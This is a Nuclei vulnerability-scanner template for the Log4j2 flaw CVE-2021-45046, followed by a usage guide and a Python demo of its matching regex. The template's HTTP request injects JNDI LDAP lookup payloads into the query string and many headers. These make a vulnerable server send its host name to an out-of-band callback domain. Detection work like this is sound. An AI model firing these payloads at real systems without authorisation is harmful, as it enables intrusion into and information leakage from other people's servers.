Apache Log4j2 - Remote Code Injection
ID: CVE-2021-45046
Severity: critical
Author: ImNightmaree
Tags: cve2021,cve,rce,oast,log4j,injection,kev,apache
Description
Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
YAML Source
id: CVE-2021-45046

info:
  name: Apache Log4j2 - Remote Code Injection
  author: ImNightmaree
  severity: critical
  description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
    - https://twitter.com/marcioalm/status/1471740771581652995
    - https://logging.apache.org/log4j/2.x/
    - http://www.openwall.com/lists/oss-security/2021/12/14/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2021-45046
    cwe-id: CWE-917
    epss-score: 0.97363
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: log4j
  tags: cve2021,cve,rce,oast,log4j,injection,kev,apache

http:
  - raw:
      - |
        GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output

    extractors:
      - type: kval
        kval:

      - type: regex
        group: 2
        regex:
          - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output

      - type: regex
        group: 1
        regex:
          - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
        part: interactsh_request
# digest: 4a0a0047304502204a840a21336953401491afca41b378a09a1f91d1a9ddcc3730006d76b55739e1022100daab695f729353f232cefc195d1664d48a955e22a6c539731cf0eecf2718fdb9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502200843391800fc986c92d1d324e54c0106161426a98bb048d5743eb3a4e12ff347022100910f5e436e3c11c97acb69fdd5d60256844494ce123e8f35f4c2acd871b9b06d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks a web application for CVE-2021-45046 by placing JNDI lookup strings in the query string and in common request headers and then waiting for an out-of-band DNS interaction on the interactsh callback domain. A finding is reported only when the interaction is seen over DNS and the queried name matches the template's regex; the extractors then pull the resolved ${hostName} and the header (injection point) that triggered the lookup out of that name, which tells you which input the vulnerable logger processed. Run it with the Nuclei tool as follows:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45046.yaml"
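To make sense of what the template reports, it helps to see how its matchers and extractors behave on a captured DNS interaction. The following is an added example, not part of the template or the Nuclei project: it copies the template's regex and replays the `matchers-condition: and` logic and the group-1/group-2 extraction in plain Python against two constructed DNS query records (the host name `webapp01`, the dotted host name `webapp01.corp.local` and the interactsh subdomain `cabc123def.oast.fun` are all made up for the demonstration). On this input group 1 captures the resolved host name and group 2 the injection-point label, and the second sample shows why group 1 has to admit dots.

```python
import re

# The matcher/extractor regex from the template above, copied verbatim.
TEMPLATE_REGEX = re.compile(
    r'\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)'
    r'\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
)


def template_matches(interactsh_protocol: str, interactsh_request: str) -> bool:
    """Mirror the template's two matchers joined by `matchers-condition: and`.

    The first matcher is a `word` match for "dns" on interactsh_protocol,
    the second a `regex` match on interactsh_request; both must hold.
    """
    dns_seen = "dns" in interactsh_protocol
    pattern_seen = TEMPLATE_REGEX.search(interactsh_request) is not None
    return dns_seen and pattern_seen


def extract(interactsh_request: str):
    """Mirror the two regex extractors (group 1 and group 2 of the same regex).

    Returns (group1, group2) or None when the regex does not match at all.
    """
    m = TEMPLATE_REGEX.search(interactsh_request)
    if m is None:
        return None
    return m.group(1), m.group(2)


# Constructed sample of a DNS interaction record (not real scanner output):
# ${hostName} resolved to "webapp01", the lookup was triggered from the
# User-Agent header ("useragent" label) and the interactsh subdomain is a
# placeholder.
SAMPLE_DNS_REQUEST = (
    ";; QUESTION SECTION:\n"
    ";127.0.0.1.webapp01.useragent.cabc123def.oast.fun.\tIN\t A\n"
)

# Same construction with a dotted host name and the Cookie-name injection
# point, showing why group 1 allows dots while groups 2-4 do not.
SAMPLE_FQDN_REQUEST = (
    ";; QUESTION SECTION:\n"
    ";127.0.0.1.webapp01.corp.local.cookiename.cabc123def.oast.fun.\tIN\t A\n"
)

if __name__ == "__main__":
    for req in (SAMPLE_DNS_REQUEST, SAMPLE_FQDN_REQUEST):
        print(template_matches("dns", req), extract(req))
```

A record that arrives over a protocol other than DNS, or whose name does not carry the `127.0.0.1.` prefix, fails the combined matcher and produces no finding, which is the behaviour to expect from the template itself.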